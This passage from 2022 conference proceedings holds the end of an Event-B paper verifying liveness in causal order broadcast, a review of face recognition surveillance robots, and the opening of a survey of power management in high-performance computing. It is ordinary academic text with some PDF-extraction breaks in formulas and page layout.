(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ / dom(sender)) ∨ (nVTP = VTP(pp)←{pp
→ VTP(pp)(pp) + 1})).
Guard(Deliver) ⇒ Guard(Deliver).
Inv 15: ∀m,pp,p·((p ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender) ∧ (p → m) ∈ /
causaldeliver) ∨ (p ∈ dom(deliveryorder)) ⇒
(pp ∈ PROC) ∨ (m ∈ MSG) ∨ (m ∈ dom(sender)) ∨ ((pp → m) ∈ / causalde-
liver) ∨ (∀p·(p ∈ PROC ∧ p = sender(m) ⇒ VTP(pp)(p) ≥ VTM(m)(p))) ∨
(VTP(pp)(sender(m)) = (VTM(m)(sender(m))) − 1)).
Formal Verification of Liveness Properties … 207
Non-divergence is a liveness property which states that events which are newly
introduced in the refinement steps do not take control forever, i.e., the new events
should not diverge or run forever. A variable V such that V ∈ N, where N is a set
of natural numbers is used to prove that newly introduced events do not diverge.
The execution of a new event in the refinement decreases the value of the variant,
but the value of variant must never go below zero. In our model of causal order
broadcast, we would like to ensure that a message is never re-broadcast because of
repeated execution of broadcast event. It is also important to prove that each sent
message is delivered to each process only once. A new variable var is introduced in
the abstract model, and the value of var for each message is set to one. The variable
var is initialized as var: = MSG × 1 in the initialization event. Each occurrence
of the broadcast event decreases the value of the variable var and sets it to zero.
Thereby once a message is broadcast, the value of the variable var becomes zero and
it cannot be decreased further. Therefore, if the invariants defined on the variable
var are satisfied, a message once broadcast cannot be broadcast again. Similarly, the
variable, delvar which is added to the abstract model ensures that a message once
delivered by a particular process successfully cannot be redelivered by it.
The invariants corresponding to the variables var and delvar are added to the
abstract model. Invariant 16 shows that variable var is assigned to each message and
is a natural number. Invariant 17 shows that the number of processes in the broadcast
system is finite. Invariant 18 shows that if the value of var for any message is zero
then that message has been broadcast. Invariant 19 states that for a particular message
m, the value of var is always greater than zero, and it cannot be less than zero as var
is a natural number.
Inv 16: var ∈ MSG → NATURAL.
Inv 17: card(PROC) ∈ NATURAL.
Inv 18: ∀(mm) · (mm ∈ MSG ∧ (var(mm) = 0) ⇒ mm ∈ dom(sender)).
Inv 19: ∀(m) · (m ∈ MSG ⇒ var(m) > 0).
Inv 20: delvar ∈ MSG → NATURAL.
Inv 21: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ causaldeliver−1 [{m}] = PROC
⇒ card(causaldeliver−1 [{m}]) = card(PROC)).
The initial value of delvar for each message is set to the total number of processes
in the system. On occurrence of each Deliver event, the value of delvar is decreased by
one. If a message is delivered to all the processes, the value of delvar for that message
becomes zero. Any re-delivery of the message at a process will set the value of delvar
to a negative value, thereby violating the invariants defined on delvar. Invariant 20
states that each message is assigned with a variable delvar which decreases as the
message is delivered by each process. Invariant 21 states that if a message is broadcast
by the sender and all processes have delivered the message then the number of
processes that delivered the message is equal to the number of processes in the system.
We further add invariants defined on the variables var and delvar to the model. If a
208 P. Yadav et al.
message m is broadcast by any process and all the processes have delivered m then
the value of delvar is zero stated by invariant 22.
Inv 22: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ card (causaldeliver−1 [{m}]) =
card (PROC) ⇒ delvar(m) = 0).
Inv 23: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender)∧ card (causaldeliver−1 [{m}]) <
card (PROC) ⇒ delvar(m) > 0).
Inv 24: ∀(m) · (m ∈ MSG ∧ (causaldeliver−1 [{m}] = PROC) ⇒ (delvar(m) =
0)).
Inv 25: ∀(m) · (m ∈ MSG ∧ causaldeliver−1 [{m}] ⊂ PROC ⇒ delvar(m) > 0).
Inv 26: ∀(m) · (m ∈ MSG ∧ m ∈ dom(sender) ⇒ card (causaldeliver−1 [{m}])
≤ card (PROC)).
Invariant 23 states that if a message m has not been delivered to all the processes
then delvar > 0. This means that message m has not been delivered to some processes.
Invariants 24 and 25 state that if a message has been delivered to all the processes
then the value of delvar is zero else it is more than zero. Similarly, invariant 26 states
that the number of processes a message has been delivered to will always be less than
or equal to the total number of processes in the system. The model and the invariants
shown above were checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. This ensures our assumption that in
our model of causal order broadcast each message is broadcast only once, and every
process will deliver each message only once.
6 Conclusions
The liveness property in the Event-B model of causal order broadcast system has
been discussed in this paper. Liveness property expresses that the Event-B model
makes progress. To ensure the property of liveness in the proposed model, we had to
ensure that our model of causal order broadcast is enabledness preserving and non-
divergent. Proving non-divergence in the model of causal order broadcast system
requires us to prove that no message is re-broadcast in our system, and each message
is delivered to each process only once. We have outlined how we can introduce a
variant and how the invariant properties can be constructed on variants. Enabledness
preservation can be proved by proving that when the refined model makes progress,
the abstract model also makes progress. We have outlined the process of construction
of invariant properties to ensure enabledness preservation. This work was carried out
on B Tools, RODIN, and ProB model checker. Both enabledness preservation and
non-divergence properties are conserved in this model of causal order broadcast
system, thus ensuring the liveness property in the model. The proof statistics of the
Event-B model of causal order broadcast system with liveness property are given
below in Table 1:
Formal Verification of Liveness Properties … 209
The model was checked successfully using Rodin platform with ProB animator
model checker, and no anomalies were found. Total 74 proof obligations were
generated and discharged either interactively or automatically.
References
1. Kindler, E. (1994). Safety and liveness properties: A survey. Bulletin of the European
Association for Theoretical Computer Science, 53, 268–272.
2. Lamport, L. (1977). Proving the correctness of multiprocess programs. IEEE Transactions on
Software Engineering, 3(2), 125–143.
3. Abrial, J. R. (1996) The B Book. Assigning programs to meanings. Cambridge University
Press, Cambridge.
4. Butler, M., & Yadav, D. (2008). An incremental development of mondex system in Event-B.
Formal Aspects of Computing, 20(1), 61–77.
5. Bodeveix, J. P., Dieumegard, A., & Filali, M. (2020). Event-B formalization of a variability-
aware component model patterns framework. Science of Computer Programing, 199, 102511.
6. Lahbib, A., et al. (2020). An event-B based approach for formal modelling and verification
of smart contracts. In International Conference on Advanced Information Networking and
Applications. Springer.
7. Metayer, C., Abrial, J. R., & Voison, L. (2005). Event-B language. RODIN deliverables 3.2,
http://rodin.cs.ncl.ac.uk/deliverables/D7.pdf.
8. Suryavanshi, R., & Yadav, D. (2012). Rigorous design of lazy replication system using Event-B.
In International Conference on Contemporary Computing. Springer.
9. Girish C., & Yadav, D. (2010). Analyzing data flow in trustworthy electronic payment systems
using event-B. In International Conference on Data Engineering and Management. Springer.
10. Yadav, D., & Butler, M. (2009). Formal development of a total order broadcast for distributed
transactions using Event-B. Method, Models and Tool for Fault-Tolerance Lecture Notes in
Computer Science (LNCS), 5454, 152–176.
11. Lahouij, A., et al. (2020). An Event-B based approach for cloud composite services verification.
Formal Aspects of Computing, 32(4), 361–393.
12. Yadav, D., & Butler, M. (2006). Rigorous design of fault-tolerant transactions for replicated
database systems using Event-B. LNCSIn M. Butler, C. B. Jones, A. Romanovsky, & E.
Troubitsyna (Eds.), Fault-Tolerant Systems (Vol. 4157, pp. 343–363). Springer.
13. B Core UK Ltd. B-Toolkit Manuals (1999)
14. Steria, Atelier-B User and Reference Manuals (1997)
15. Abrial, J. R., & Cansell, D. (2003) Click’n’Prove—Interactive Proofs within Set Theory.
16. Abrial, J.-R., Butler, M., Hallerstede, S., Hoang, T. S., Mehta, F., & Voisin Rodin, L. (2010). an
open toolset for modelling and reasoning in Event-B. International Journal on Software Tools
for Technology Transfer (STTT), 12(6), 447466.
210 P. Yadav et al.
17. Lamport, L. (1978). Time, clocks, and the ordering of events in a distributed system.
Communication, ACM, 21(7), 558–565.
18. Yadav, D., & Butler, M. (2007). Formal specifications and verification of message ordering
properties in a broadcast system using Event-B. In Technical Report. School of Electronics and
Computer Science, University of Southampton.
19. Birman, K., Schiper, A., & Stephenson, P. (1991). Lightweight causal and atomic group
multicast. ACM Transactions Computer System, 9(3), 272–314.
20. Pooja, Y., Suryavanshi, R., Singh, A. K., & Yadav, D. (2019). Formal verification of causal
order-based load distribution mechanism using Event-B. Data engineering and applications
(pp. 229–241). Springer.
21. Abrial, J.-R. (1996). Extending B without changing it (for developing distributed systems). In
H. Habrias (Ed.), First B Conference.
22. Yadav, D., & Butler, M. Formal development of broadcast systems and verification of ordering
properties using Event-B.
23. Yadav, D., & Butler, M. (2009). Verification of liveness properties in distributed systems.
In International Conference on Contemporary Computing (pp. 625–636). Springer.
A Comparative Study on Face
Recognition AI Robot
Abstract Face recognition, the application of image processing, has gained a lot of
attention. People have started researching and working on it to enhance the field of
automation, security, and surveillance. The main reason behind this hype is the vast
availability of commercial applications and accessibility to the latest technologies.
Though the machine level recognition systems have gained a certain level of perfec-
tion, their success rate can be limited based on the application. This is because the
image captured by the outdoor system is hard to detect and recognize due to change
in light, different background conditions, and variations in the position of the person
or object. So, we can say that the present system is far behind the perfection that
a human possesses. This paper provides information on both still and moving, i.e.,
video-based face recognition. The main reason behind writing this review paper is to
shed light on the existing literature on this topic and add some more value to knowl-
edge gained concerning machine-based face recognition. Most of the system uses
the local binary pattern (LBP) approach to perform face recognition. For detecting
the face in the captured image, the Haar cascade algorithm is used where the person’s
facial feature is extracted and saved in a database for future reference. So, to provide
an effective survey, we have classified the existing method for face recognition and
explored the latest emerging technologies in this field.
1 Introduction
A face recognition robot utilizes a method of image processing for detecting a face
using a camera. The robot [1–5] identifies various essential features of the face
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 211
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_17
212 S. Sunar et al.
from the captured image and then compares it with the stored data. Various algo-
rithms/methods/techniques are used for recognizing a human face, such as local
binary pattern (LBP), support vector machine (SVM), etc.
Most face recognition systems use PICAMERA camera module to capture the
image, while Raspberry Pi 3 is used to implement face detection and recognition [1–
8]. Adaboost, which was introduced by Paul Viola in 2001, is used for face detection.
This algorithm majorly uses a cascade classifier that comes under a Haar-like feature.
This feature gives them a unique ability to detect a human face, regardless of the
background conditions, the color of the image captured, size, and shape. On the
other hand, it quickly recognizes a face, linear binary pattern algorithm [6–8, 10].
The face’s digital image is immediately divided into pixels, which are later used for
further processing. The identified feature compares pixels to pixels with that of the
features stored in the dataset [11–13]. The robot performs various activities that are
controlled using an Arduino Uno. It detects the motion of any object using a PIR
sensor that initiates the recognition process. It is also responsible for controlling the
robot’s motion using a phone [13–16]. When the human’s face is recognized, an SOS
message (alert message) is sent to the organization’s owner.
The whole process performed by the robot is divided into three stages:
• In the first stage [1–11], a face is detected using the Viola–Jones detection
algorithm.
• Further [5–10], in the second stage, the detected face’s tracking is done using
Kanade- Lucas-Tomasi (KLT).
• Additionally, in the third stage, the vital feature is identified, which sums up the
tracking process. Majorly the whole procedure of tracking a face is an amalga-
mation of detectionfollowed by identifying unique points in a detected face using
any of the algorithms known.
2 Literature Review
In [1], the face recognition is performed with the cascade classification and LBPH
face recognizer method using Python 2.7 with OpenCV library. It offers excellent
accuracy of 92.73%. The paper [2] performs real-time interaction of human and robot
Indore where it processes 11 frames per second and provides 94% recognition rate
using visual tracking architecture and RBF neural network. It performs rapid face
recognition of family members, as each member has a distinct RBF neural network.
Paper [3] presents a comparison between Adaboost and Imaboost. Adaboost, using a
combination of a simple classifier, generates a comparatively strong classifier where
the clonal selection algorithm replaces the best classifier. A combination of AdaBoost
and artificial immune system is proposed as Imaboost, which has enhanced system
processing by improving the classification performance.
In [4], face detection is performed on a live video stream for security in commercial
places. It is designed to perform the detection using the web camera and to track the
detected face using Arduino and OpenCV, where the primary algorithm used is
A Comparative Study on Face Recognition AI Robot 213
3 Implementation
A robot has a specific surveillance cycle, each of which is divided in two states: an
active state and an ideal state [1–5]. During the ideal state, the robot remains in a
stationary state inside the organization, whether it is home or office during daytime,
and is moving around the same compound at night. This is because, in that time
[7–15], the PIR sensor is active and searches for any movement around it. As we
know, the sun radiates infrared radiation continuously; So, if the sun rays fall on the
PIR sensor, it generates an alarm signal even if no movement is detected. During
the daytime, they are placed indoors so that PIR sensor does not directly contact
the sunlight. During the active state, I2C communication is established between
Raspberry Pi and Arduino Uno using a camera module. In the structure made for
the robot, the camera is inclined at an angle of 45 ° with reference to the ground.
At this angle, the camera detects a human face, captures it, and moves to the face
recognition process. When the face gets matched to the face saved in the dataset, it
sends a message to the owner with the name of that person recognized by the robot.
On the other hand, if the face is not matched with that in the dataset, an alert message
is sent through a GSM module.
Various methods are used for detecting the face such as Viola–Jones method [6–
13]. There are a few crucial concepts with the help of which it detects a human
face.
1 Haar feature: This is a feature [14–19], which analyzes the captured image to
find out whether there is a human face or not. It divides the captured image into
two parts: the dark side and the bright side. It creates the average of all the dark
pixels and the average of light pixels, and both the averages are subtracted to
obtain the required pixels.
2 Adaboost algorithm: It is considered to be the easiest and fast process. Viola and
Jones used this algorithm because it increases the performance using elementary
learning. During the Adaboost learning, the output of this is various data that can
be grouped to form a classifier, which can be further used. The classifier contains
a very small feature of the detected face, which is why they are commonly used
to detect the pattern in the whole process.
3 Integral image: The integral image is a vital concept that accelerates the feature
detection process and boosts the pixels’ value from the original image that is
detected. The left side of the image is used for the sum of the pixels above the
threshold voltage. This addition process starts from the top left and to the bottom
right of the image (Fig. 1).
One of the many face recognition approaches is local binary pattern (LPB) [3–15].
The binary pixel values at the center are compared with the remaining 8 pixels around
A Comparative Study on Face Recognition AI Robot 215
it. To match the similarities between the captured image and the image in the dataset,
the LBP method can be used. In this approach, the surrounding pixel values reduce
the value of the center image. It works on a 3 × 3 matrix pixel image. It gives 1 the
result if the value is more than or equal to 0, but it gives 0 as a result if the value
obtained is less than 0. After that, obtained binary values are the 8 surrounding pixels
in 3 × 3 matrix sorted either clockwise or anti-clockwise and then converted into
decimal form to replace the pixel value of the center image (Figs. 2 and 3).
• Detection:
Due to technological advancement, there are various devices such as webcam
and many others that can be used in order to obtain input videos. Now the video
obtained is broken down into multiple frames, and each of the frames are examined
closely to detect any face in it. The detection is carried on all the frames, and once
the face is detected in any of the frames, a box is drawn around the face detected
[17, 18]. Now, the coordinates of the boxes drawn are saved for future reference.
This is performed using MATLAB software. Now the coordinates obtained are
fed into the microcontroller.
• Tracking:
Once the coordinates are fed to the Arduino, the microcontroller tracks the detected
human’s face. Arduino is one of the most popular open-source platforms that has
application based on both software and hardware for controlling the motion of
the robot, servo motor are used, and two such servo motor are interfaced with
a microcontroller for the same purpose [19]. Before performing any task, the
servo motors are calibrated to the center. The coordinates which were fed to a
microcontroller is used to track the face in the specified frame. With the person’s
movement, the position of the webcam also changes, but there is a constraint that
the servo motor rotates only from degree to maximum up to degree [20]. Viola–
Jones operates only on a front-facing faces, so instead of Viola–Jones, the KLT
algorithm can be considered to track the face even in a live video (Fig. 4).
4 Hardware Specification
The small size as that of a credit card and a Wi-Fi module, and a Bluetooth module
that was already present on the Raspberry Pi makes it more profitable to use than
a microcontroller [1–12]. So, Arduino Uno and Raspberry Pi are considered the
most crucial component used in most of the roots. Apart from Raspberry Pi [1–5],
there are also a few most important components such as chassis (body of the robot),
motors, and battery, and at the same time, it also contained motor driver (L293D) for
controlling the movement of the robot [6–11].
Since one of the most critical applications of the robot is sending SMS to the
owner’s number and for the same, a GSM module with SIM900a has been installed.
In order to monitor everything that the robot is recording, processing, and displaying,
a remote display is also used, and it is connected to the root using a Wi-Fi module.
PIR sensor is considered one of the few important components because it initiates
the detection whenever it identifies some movement nearby. After the PIR sensor
detects any motions, it sends a signal to the Arduino board. A signal is sent to the
Raspberry Pi to activate and capture the moving object’s image and initiates the face
recognition and detection process.
A Comparative Study on Face Recognition AI Robot 217
For tracking [1–13], an Arduino and one servo motors were used to employ the
Viola–Jones technique though it has a few restrictions, one among them being that
they operate only on front-facing faces. So, it was later improved and modified by
using the KLT technique to track faces even in live videos. In the modified technique,
the Atmega 328p microcontroller was used along with Arduino and webcam.
5 Software Specification
We can say that software forms the backbone of this robot. Without the software, it
cannot perform any task. As we have already discussed, the robot’s task is divided
into three parts: face detection, face recognition, and generating an alert signal. So,
for face detection and face recognition, programming is done in Python, whereas
programming on Arduino is done for generating an alertsignal.
In [1–4], the Haar cascade is used to perform the face detection which is performed
using the OpenCV tool. In this technique, a dataset contains images with features
(positive image) and images that do not have any feature (negative images), which
can be used to train the classifier tooperate accurately. It gives the most efficient
result because the more we train the robot the better its result. Hence in this process,
it tries to detect a human’s face in a frame of the video, and once the face gets
detected, it makes a box around the face, and the coordinates of the box are saved in
the microcontroller for further process.
For AI-based robots, a dataset needs to be created to be trained so that the more
we train, the more precise it will give the output. For creating the dataset, [1–7]
hundreds of humans’ images are taken and face recognition is performed, where the
face gets detected and saved in the dataset folder. For the robot’s training [8–17], the
local binary pattern (LBP) approach is primarily used.
Equation (1) is used for calculating the pixels of the image:
P−1
LBP P,R (X C , YC ) = S g p − gc 2 p
P=0
So, it is observed that for face detection and face recognition, it uses the cascade
algorithm which is performed using OpenCV tool, and an alert signal is generated
using an Arduino IDE. The final robot training using the dataset is done using the
LBP technique to increase its efficiency.
218 S. Sunar et al.
After creating the captured image database, the face can be detected in any of the
available pixels of the image in the database, and there is a coordinate corresponding
to every detected face. We also know that every captured image has a particular
resolution, e.g., the live video which is captured by a webcam has a certain resolution
like 1280*720 (or 640*360 or 640*480). Now, we need to find out the coordinate of
the detected face, which can be done by using the following formula:
w
X, X = X +
2
h
Y, Y = Y +
2
where
X = initial face coordinate horizontally
W = width coordinate of face
X,X = center coordinate of the face horizontally
Y = initial face coordinate vertically
H = height of face coordinate
Y,Y = center coordinate of face vertically.
A Comparative Study on Face Recognition AI Robot 219
The face recognition robot that was developed and considered one of the great
advancements of technology has saturated its application despite using various high-
end technologies and not doing anything other than capturing an image, recognizing
a face, and store the image in the database. It should have some real-time application
which could be adaptive to the surrounding and condition around it. The existing
face recognition robots are lacking in this section.
In this work, apart from face recognition, which is the heart of this project. It is
being tried to make it more beneficial for day-to-day use for safety. In the present
scenario, the whole world is fighting against Corona and wherever a person goes,
whether its office, college, schools, malls, etc. It is seen initially that a person with an
infrared thermometer to measure the body temperature. The further scope in work is
to make an AI-based robot that recognizes any person and at the same time measures
the body temperature.
8 Conclusion
The paper is presented with an aim to review the papers written and technologies
developed in the field of face recognition. The present study concludes that using the
hybrid method of computing like ANM, SVM, and SOM results in an enhanced face
recognition algorithm. In this paper, we have also described the various problems
faced during face recognition in an unconstrained environment. The issues that were
faced are also mentioned, and the reasons they need to do more study and research
were also stated. Along with it, several techniques that are used in various papers for
these topics have also been presented. Also, we have described the various methods
required to develop the most effective and efficient face recognition system. This
review paper has also tried to present various vital areas where research can be done.
This paper will also help researchers in this field who are trying to come up with
some new and efficient technology.
References
1. Mittal, S., Rai, J. K. (2016). Wadorp: An autonomous mobile robot for surveillance. In
IEEE International Conference on Power Electronics. Intelligent Control and energy systems
(ICPEICES).
2. Maneesha, K., Shree, N., Pranav, D. R., Sindhu, S. K., & Gururaj, C. (2017). Real time face
detection robot. In 2017 2nd IEEE International Conference on Recent Trends in Electronics,
Information & Communication Technology (RTEICT). https://doi.org/10.1109/rteict.2017.825
6558.
3. Viola, P., & Jones, M. (2001). Rapid object detection using boosted cascade of simple features.
IEEE Computer Society Conference on Computer Vision and Pattern Recognition, I, 511–518.
A Comparative Study on Face Recognition AI Robot 221
4. Viraktamath, S. V., Katti, M., Khatawkar, A., & Kulkarni, P. (2013). Face detection and tracking
using open CV. The SIJ Trans on Computer Network & Communication Engineering (CNCE),
1(3), 45–50.
5. Alweshah, O. A., Alzubi, J. A., & Alzubi, S. A. M. (2016). Solving attribute reduction problem
using wrapper genetic programming. International Journal of Computer Science and Network
security, 16(5), 77.
6. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd Inter-
national conferences on Information Technology, Information Systems and Electrical Engi-
neering (ICITISEE), Yogyakarta, 2017 (pp. 315-320) https://doi.org/10.1109/ICITISEE.2017.
8285519.
7. Stekas, N., & Heuvel, D. V., (2016) Face recognition using Local Binary Patterns Histograms
(LBPH) on an FPGA-based system on Chip (SoC). In IEEE International Parallel and
Distributed Processing Symposium Workshop, November2016.
8. Mehra, S., & Charaya, S. (2016) Enhancement of face recognition technology in biometrics.
International Journal of Scientific Research and Education 4(8)
9. Aydin, L., & Othman, N. A. (2017) A new IoT combined face detection of people by
using computervision for security Application. International Artificial Intelligence and data
Processing Symposium (IDAP).
10. Rahim, M. A., Hossain, M. N., Wahid, T., Azam, M. S., & l. . (2013). Face recognition using
Local Binary Patterns (LBP). Global Journal of Computer Science and Technology Graphics
& Vision, 13(4), 3.
11. Tian, Y.-L., Kanade, T., & Cohn, J. F. (2001). Recognising action units for facial expression
analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence, 23(2), 95–115.
12. Tathe, S. V., Narote, A. S., Narote, S. P. (2016). Face detection and recognition in videos. In
2016 IEEE Annual India Conference(INDICON).
13. Tikoo, S., & Malik, N. (2016). Detection of face using viola jones and recognition using
back propagation neural network. International Journal of Computer Science and Mobile
Computing, 5(5), 288–295.
14. Zhao, W., Chellappa, R., Rosenfeld, A., Phillips, P. J. (2003). Face recognition: A literature
survey (pp. 399–458). ACM Computing Surveys.
15. Jain, R., Gupta, D., Khanna, A. Usability feature optimization using MWOA. In S. Bhat-
tacharyya, A. Hassanien, D. Gupta, A. Khanna & I. Pan (Eds.), International Conference on
Innovative Computing and Communications (ICICC2018). Lecture Notes in Networks and
Systems, (Vol 56). Springer.
16. Hegel, F., Eyssel, F., & Wrede, B. (2010). The social robot flobi: Key concepts of industrial
design. IEEE International Symposium on Robot and Human Interactive Communication, 19,
107–112.
17. Kalas, M. S. (2014). Real time face detection and tracking using OpenCV. International Journal
of Soft Computing and Artificial Intelligence, 2(1), 41–44.
18. Thakare, N., Shrivastavaand, M., & Kumari, N. (2016). Face detection and recognition for auto-
matic attendance system. International Journal of Computer Science and Mobile Computing,
5(4), 74–78.
19. Manjunatha, R., & Nagaraja, R. (2017). Home security system and door access control based
on face recognition. International Research Journal of Engineering and Technology, 4(3),
437–442.
20. Sanjaya, W. S. M., Anggraeni, D., Zakaria, K., Juwardi, A., & Munawwaroh, M. (2017). The
design of face recognition and tracking for human-robot interaction. In 2017 2nd International
Conferences on Information Technology, Information Systems and Electrical Engineering
(ICITISEE). https://doi.org/10.1109/icitisee.2017.8285519.
State-of-the-Art Power Management
Techniques
Abstract Energy efficiency is one of the biggest challenges presently faced by high
performance computing (HPC) systems. The need to build energy-efficient computer
systems and applications in the field of scientific computing is growing every day.
Numerous researches have been carried out in the fields of embedded systems and
mobile computing to minimize the power consumed by devices. The components
and algorithms developed for achieving energy efficiency in such systems can also
be applied in the field of HPC. In this paper, we survey the power managing tech-
niques for HPC systems. We discuss different power management techniques on
several important parameters to identify the merits and demerits of such techniques.
This paper is intended to help in developing more deep understanding of different
power management techniques and designing more energy-efficient HPC systems of
tomorrow.
1 Introduction
Power usage by the virtual systems has trespassed all of its tolerable limits and has
become a cause for major concern, since the majority of day-to-day affairs across
the world are linked either directly or indirectly to the virtual transactions through
computer networks. As per the reports, large-scale data centers in USA consume
around 70 billion kWh, which represents 2% of the energy consumption of the country
[1]. The inability to meet such a huge consumption leads to the temporary delay or
shutdown of the several data center projects. High-density power consumption results
M. Ahmed (B)
HKBK College of Engineering, Bangalore, India
W. Ahmed
Faculty of Computing and Information Technology, King Abdulaziz University, Jeddah, Saudi
Arabia
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 223
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_18
224 M. Ahmed and W. Ahmed
The replacement of high power components with low power components to save
power is referred to as static power management.
Rivoire et al. [6] suggested JouleSort, to evaluate the energy efficiency. The study
revealed that JouleSort was approximately three times energy efficient compared to
the existing techniques. However, JouleSort did not consider all the possible energy-
related concerns of multimedia applications since it focused on data management
tasks.
Caulfield et al. [7] described a new system architecture known as Gordon for
reducing the consumption of power and for increasing of data-intensive applica-
tions performance. They combined flash memory with power-efficient processors for
State-of-the-Art Power Management Techniques 225
reducing the power consumption. They studied impact of flash storage and Gordon
architecture on the power efficiency and performance of data-centric applications.
The findings revealed that Gordon systems performed better than the disk-based
clusters by 1.5 times and delivered up to 2.5 times more improved performance per
watt.
Andersen et al. [8] made an attempt to modify the conventional architecture of
data-intensive clusters to minimize the power consumption without any compromise
in their capacity, latency, availability, and throughput. They presented an architecture
known as fast array of wimpy nodes (FAWN), where the energy-efficient CPUs are
combined with flash storage to provide faster and more efficient random access to
data. The analysis revealed that FAWN clusters have the capability of handling 350
key-value queries per Joule of energy which is two times more than the disk-based
system.
Hammilton [9] identified that the cost of delivering high-scale services was mainly
dependent on the hardware and power required for the services. The study investi-
gated power dissipation in high-scale data centers. It was found that low-power
servers yielded the same aggregate throughput effectively at additional cost com-
pared to the high-power servers.
Vasudevan et al. [10] experimentally evaluated FAWN, which consists of a large
number of slower but efficient nodes coupled with low-power storage. The study
used a set of microbenchmarks to check the maximum performance of the wimpy
nodes. The findings revealed that the overall performance of low-frequency nodes
was found to be more than the conventional high-performance CPUs.
However, there are some limitations in this architecture which was pointed out
by Valentini et al. [11]. According to them, the major concern is the feasibility of
FAWN architecture to solve problems that cannot be parallelized or the working set
size cannot be further divided and assigned to the available memory of the smaller
nodes.
According to Liu and Hsu in [2] dynamic speed scaling (DSS) and dynamic resource
sleeping (DRS) are the two variants of dynamic power management (DPM). In DSS,
consumption of power of the processor is controlled by modulating its speed. Thus,
the performance is compromised depending on the necessity. Dynamic voltage scal-
ing (DVS) operates by changing the voltage, i.e., either increasing or decreasing the
voltage according to circumstances. If we require more of performance, we increase
the voltage and this is called overvolting, and if we want to save power, we decrease
the voltage and this is known as undervolting. Similarly, dynamic frequency scal-
ing (DFS) operates by scaling frequencies. Dynamic voltage and frequency scaling
(DVFS) operates by curtailing the frequency and/or supply voltage to the processor.
Thermal throttling depends upon the temperature of the processor. Multifrequency
memories, on the other hand, diminish the working frequency with the help of mul-
226 M. Ahmed and W. Ahmed
tispeed disks. Increased energy consumption due to transition in the states of per-
formance is one of the limitations of these mechanisms. Moreover, it is responsible
for the increased resource latency overhead. DRS inactivates (power-off) the com-
ponents of the computer to conserve energy and activates them when required. The
power on and off states are described as C0 and Cn, respectively. This mechanism
is restricted by the amount of time and energy spent on the transition from inactive
state to active state.
Ge et al. [12] recommended performance-based distributed DVS techniques for
power-aware HPC clusters. The study performed a comparative analysis of various
available DVS techniques on a power-aware cluster while executing parallel scien-
tific applications and pointed out that DVS scheduling techniques achieved significant
energy savings. The study found out that DVS scheduling techniques achieved 36%
total energy savings with no loss in performance. However, depending on the applica-
tion, we have varied energy savings, system workload, and the DVS strategy. Another
drawback identified in this study was that these techniques were implemented largely
by manual means and should be replaced by modern automated ones.
Hotta et al. [13] introduced a power-performance optimization technique based
on the power profiles generated in high-performance PC cluster by using DVFS
scheduling. The execution of the program was split into several sections, and the
best section for power efficiency was selected. Selecting the best was not an easy and
direct task as the overhead of DVFS transition is not free from errors. An optimiza-
tion algorithm was proposed to select a gear while also considering the transition
overhead. Power-profiling system known as PowerWatch was designed to examine
the efficiency of the optimization algorithm. The findings revealed that the study
achieved almost 40% reduction in terms of energy delay product (EDP) without any
major impact on its performance.
Rajamani et al. [14] designed a novel approach aimed at power management
for which the critical workload indicators, power and performance usage of the
applications were continuously monitored. They proposed two solutions, namely
performance maximizer which identifies the best performance under specific power
constraints and powersaver which minimizes the power consumption while main-
taining optimum performance levels.
The study by Freeh et al. [15] presented a system known as jitter, which reduces
the processor’s frequency in a cluster to minimize its power consumption. Jitter
reduces the energy spent by the nodes at synchronization points during various slack
times, thereby achieving significant reduction in the energy consumed. The findings
showed that jitter saved 8% of the energy consumed with 2% time penalty on an
unbalanced program.
According to Khargharia et al. [16], power management techniques can be clas-
sified into the following types, hardware-based power management, turning off idle
devices, quality of service (QoS), and energy trade-offs. Hardware-based power man-
agement involves varying the voltage and frequency of the processor according to
the performance requirements. Turning off devices is yet another DPM technique in
which the devices are turned on/off wholly to reduce the power consumption. This
technique can be used in both battery-operated devices and servers. QoS and energy
State-of-the-Art Power Management Techniques 227
trade-offs technique involve saving more power at the cost of performance efficiency
within the acceptable limits. They presented a theoretical framework (Automatic
Memory Management) for optimizing power and performance in data centers dur-
ing runtimes automatically with the help of a multichip memory system.
Laszewski et al. [17] used DVFS to minimize power consumption in virtual
machines. The study proposed and implemented a scheduling algorithm that allo-
cates virtual machines in a DVFS-enabled cluster by dynamically scaling the supply
voltages. Simulation techniques were used by the study to analyze the algorithm.
Performance analysis of the study revealed that design and implementation of such
scheduling algorithms achieved significant reduction in the power consumption.
Huang and Feng [18] used a specific workload characterization that infers the
CPU stall cycles due to off-chip activities. The study presented a power-aware, eco-
friendly, run-time algorithm based on this workload characterization. In order to
scale the voltage and frequency supplied to the processor in a parallel computing
environment and to obtain the workload characterization, the algorithm dynamically
monitored the processor state. The algorithm was found to achieve the best perfor-
mance control over the b-adaptation algorithm and Linux ondemand governor by
achieving 11% savings in the overall energy consumed.
Etienne and Gernot [19] analyzed the efficiency of DVFS on three cutting-edge
generations of AMD Opteron processors by implementing memory-bound bench-
marks. The study showed that the effectiveness of DVFS was found to be low on
new platforms and the actual savings were observed only when the execution times
were shorter (at higher frequencies) and were “padded” with the energy consumed
when idle.
Alvarruiz et al. [20] proposed a work called CLUES which replaces idle state with
power off state. The system was integrated with the help of different HPC cluster
middleware such as batch-queuing systems and cloud management systems. Pow-
ering on and off of the computing nodes was performed with the help of different
mechanisms such as Power Device Units, Wake-on-LAN, Intelligent Platform Man-
agement Interface, or other infrastructure-specific mechanisms. The performance of
the model was evaluated against two real use cases involving two different HPC
clusters. The findings revealed energy and cost savings of about 38% and 16%,
